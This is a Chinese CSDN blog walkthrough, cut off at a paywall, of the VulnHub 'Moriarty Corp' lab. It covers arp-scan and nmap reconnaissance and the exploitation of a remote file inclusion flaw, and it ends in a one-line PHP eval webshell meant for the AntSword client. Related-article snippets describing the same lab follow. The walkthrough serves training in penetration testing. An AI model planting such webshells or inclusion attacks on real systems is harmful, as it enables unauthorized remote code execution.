BoredHackerBlog:Moriarty Corp【攻略】

已于 2023-11-03 14:46:51 修改
阅读量298 收藏
点赞数
分类专栏: VulnHub 靶机攻略 文章标签: linux web安全
于 2023-10-30 16:46:29 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_51494407/article/details/134122901
版权
本文介绍了Moriarty Corp在Vulnhub上的渗透测试攻略,涉及信息收集、Web渗透(文件包含漏洞利用)、内网渗透(包括代理设置、内网扫描和密码爆破)、SSH爆破、任意密码修改以及远程执行代码。通过这一系列步骤,逐步揭示了靶场中的安全漏洞并获取多个flag。
摘要由CSDN通过智能技术生成

文章目录

介绍

  • Vulnhub地址:BoredHacker博客: Moriarty Corp ~ VulnHub

  • 发布日期: 29 Mar 2020

  • 难度:中等

  • 描述:

    你好代理。

    你来这里执行一项特殊任务。

    一项任务是摧毁最大的武器供应商之一,即莫里亚蒂公司。

    在网络应用程序中输入标志{开始}以开始使用!

    笔记:

    • Web 面板位于端口 8000 上(不在范围内。不要攻击)
    • 标志以 #_flag.txt 格式存储。标志以标志{}格式输入。它们通常存储在 / 目录中,但可以位于不同的位置。
    • 若要暂时停止播放,请暂停 VM。不要关闭它。
    • 添加标志时,Web 应用会在后台启动 docker 容器。关闭并重新启动会搞砸它。

  • 靶场环境:

机器 ip
kali 10.4.7.135
靶机 10.4.7.141:8000

信息收集

主机发现

arp-scan -l

image-20231030163924339

端口扫描

namp -sV -O 10.4.7.141

image-20231030163958117

网站探测

根据 Vulnhub 描述访问8000端口。

输入 flag{start} 开始。

image-20231030164017797

根据提示,继续访问80端口。

image-20231030164031548

在网站的连接中发现文件包含漏洞。

文件包含漏洞,通常分为本地文件包含和远程文件包含。本地文件包含,通常需要能够写入 webshell 的文件进行包含,进而获取 shell 权限。远程文件包含,可对远程写入 webshell 的文件进行包含,获取 shell 权限。

image-20231030164107226

Web渗透

文件包含

在 kali 开启 Web 服务,靶机访问 php.php 文件进行包含,验证远程文件漏洞存在。

echo "<?php phpinfo(); ?>" > php.php
python3 -m http.server 80

image-20231024174409289

上传一句话木马。

<?php eval($_POST['ant']; ?>

image-20231024201328589

image-20231024201347532

使用中国蚁剑连接。

下载地址:

最低0.47元/天 解锁文章
[靶机渗透笔记] BOREDHACKERBLOG: MORIARTY CORP
H4ppyD0g的博客
01-23 2467
靶机链接https://www.vulnhub.com/entry/boredhackerblog-moriarty-copy%2C456/ 确定靶机 扫描存活主机 sudo nmap -sP 192.168.5.5/24 -sP 进行ping扫描 扫描具体信息 sudo nmap 192.168.5.5/24 确定靶机ip为192.168.5.6,根据vulhub这个靶机的信息提示,访问8000端口。 根据提示先输入flag{start},然后给出新的提示,攻击80端口。 文件包含 两个按钮,随便点
[靶机渗透笔记] 4.HA-NARAK
H4ppyD0g的博客
05-05 1782
制定了一个小目标,做100个靶机渗透实验,并记录在此平台上,按照顺序排序,同时也希望能够帮助到一起进步的各位。笔者声明,此系列文章只为学习研究使用,请勿将本文章内的任何技能用于真实环境。 系列文章 [靶机渗透笔记] 1.MONEYBOX: 1 [靶机渗透笔记] 2.HACKADEMIC: RTB1 [靶机渗透笔记] 3.BOREDHACKERBLOG: MORIARTY CORP 文章目录靶机链接确定靶机目录扫描密码爆破定制字典hydra爆破获取webshell主机信息搜集-配置不当提权-修改motd文件
vlunhub- BoredHackerBlog Moriarty Corp
GALi_233的博客
08-08 968
Description Hello Agent. You’re here on a special mission. A mission to take down one of the biggest weapons suppliers which is Moriarty Corp. Enter flag{start} into the webapp to get started! Notes: Web panel is on port 8000 (not in scope. Don’t attack)
vlunhub- BoredHackerBlog Moriarty Corp(内网渗透测试靶场)
rang的博客
08-19 2792
文章目录靶场环境主机发现利用nmap 进行二层扫描利用arp-scan扫描探测文件包含利用远程文件包含 执行木马通过 LFISuite自动化工具 利用文件包含漏洞暴力破解文件上传SSH弱口令# payload反弹# 任意密码修改# 添加代理# 远程代码执行# 内网探测 #个人总结 靶场环境 攻击机:kali(192.168.1.100) 目标机:Moriarty Corp(192.168.1.105) 内网(172.17.0.0/24) 这里用vmware搭建靶场扫描不到目标,改用VM_VirtualBo
vulnhub靶机-MoriartyCorp
臭nana的博客
05-01 4242
参考文章:https://blog.csdn.net/shuteer_xu/article/details/105549120 由于参考了这篇文章,所以前期使用kali做的,但是后面可能由于自身原因,达不到和他一样的效果,所以用了windows的reGeorg进行代理(后面会知道),其实可以全程在windows下操作。 环境:虚拟机采用桥接模式 靶机ip:192.168.0.106(还有一个.........
Moriarty Corp靶场攻略
Ms08067安全实验室
04-15 3076
点击上方“蓝字”关注公众号获取最新信息!本文作者:a-running-snail(贝塔安全实验室)Moriarty Corp靶场环境包含一台外网服务器和三台内网主机,攻击者需先对外网服务...
深入iOS开发:Moriarty类库与框架源码解析
资源摘要信息:"iOS应用源码之【类库与框架】moriarty.rar" 本文将详细介绍在iOS应用开发中,类库与框架的使用和重要性,并对名为"Moriarty"的iOS应用源码包进行深入的解析。在软件开发中,类库与框架作为代码复用的...
MORIARTY CORP打靶流程(已完成)
qq_53733257的博客
11-06 956
MORIARTY CORP打靶流程
靶机渗透-Vulnhub-Moriarty Corp
dahege666的博客
08-18 853
Moriarty Corp靶场环境包含一台外网服务器和三台内网主机,攻击者需先对外网服务器进行web攻击,依据提交flag后的提示信息,逐步获取内网主机权限。 1、靶场环境 攻击机kali:191.168.239.131 Moriarty Corp: web:192.168.239.135 内网:172.17.0.3 Moriarty Corp 内网1:172.17.0.4 Moriarty Corp 内网2:172.17.0.5 Moriarty Corp 内网3:172.17.0.7 ...
vulnhub-MoriartyCorp渗透测试
遇事不决冲冲冲
11-25 3558
环境搭建 这个环境搭建还是很奇怪的,必须用virtual box,用vmware会出现扫不到ip的情况(一个区域网下有一个人搭建环境的话其他人可以直接访问到。) Moriarty Corp官网下载地址 思路 渗透测试 仍然是刚开始直接用arp-scan(nmap)进行ip扫描,nmap进行端口扫描 sudo arp-scan -l nmap -sV 192.168.1.247 ...
靶机一:BOREDHACKERBLOG_ SOCIAL NETWORK
travelnight的博客
11-08 2093
靶机一:BOREDHACKERBLOG: SOCIAL NETWORK 靶机渗透
5-1靶场夺旗
高冷的宅先生
04-01 443
1.信息探测 #扫描主机开放的端口号 nmap -p- -T4 192.168.2.115 #快速扫描主机全部信息(会遗漏端口开放情况) nmap -T4 -A -v 192.168.2.115 #探测敏感信息 nikto -host http://192.168.2.115:80(9090) dirb http://192.168.2.115:80(9090) 2.深入挖掘 #分析nmap、n...
vulnhub_内网渗透测试的记录——网络安全
HBohan的博客
07-31 551
主要考察知识点 文件包含 内网穿透 命令上传 弱口令 更改权限 HTTP协议Header ElasticSearch-CVE 暴力破解 网络拓扑 写完之后把靶机的网络拓扑也做了一下 写在之前 这次用的虚拟机是VM_VirtualBox,第一次用,配置了许久,因为靶机是内网环境,所以有些网络配置需要手动调整 网络配置设置成如上,再次扫描IP,根据MAC地址就可以找到我们的靶机IP了。 靶机下载地址: BoredHackerBlog: M.
linux长时间运行任务中断报警trap
djl的专栏,blog.djl.cx好记
11-08 309
每天要运行的定时任务, 时间很长, 有一天突然被中断了, 如果能有个中断提醒就好了。sleep 命令模拟一个长时间运行的任务,并在后台运行它。wait 命令等待任务完成或被杀死,并检查。wait 命令的退出状态码来判断脚本是否被。在这个脚本中,我们使用。
linux rocky 9.4部署和管理docker harbor私有源
xikui1551的博客
11-08 1191
rocky 部署Harbor私有镜像仓库
linux-find和zgrep
luxideyao的专栏
11-07 342
命令本身并不支持递归搜索,它只能搜索单个压缩文件。但是,你可以结合使用。如果你想要搜索所有类型的压缩文件,你可以使用。是你想要搜索的目录的路径。是你想要搜索的文本模式,文件,你可能需要使用。文件并搜索其中的内容。作为输入文件的占位符。
Linux:网络协议socket
Au_ust的博客
11-05 1282
我们之前学的通信是本地进程间通信,如果我们想在网络间通信的话,就需要用到二者的ip地址,分别被称为源IP地址和目的IP地址,被存入ip数据包中,其次我们还需要遵循一些通信协议。TCP协议:传输层协议,有连接,可靠传输,面向字节流(无明确边界的字节序列),难UDP协议:传输层协议,无连接,不可靠传输,面向数据流(以数据包为单位),简单网络通信的本质也是进程间通信,你怎么知道你要和哪个进程通信?
Xshell,Shell的相关介绍与Linux中的权限问题
最新发布
2301_81265915的博客
11-09 687
首先,先介绍一下我们学习Linux的工具:XshellXShell 是一个流行的 Windows 平台上的 SSH、Telnet 和 Rlogin 客户端,主要用于远程连接 Linux/Unix 系统。它的运行原理大致如下:1:协议支持: XShell 支持多种远程协议(如 SSH、Telnet、Rlogin 等)。最常用的是 SSH 协议,它提供了安全的加密通信。SSH(Secure Shell)通过加密对客户端和服务器之间的通信进行保护,以防止数据在网络中被窃听和篡改。2:建立连接。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值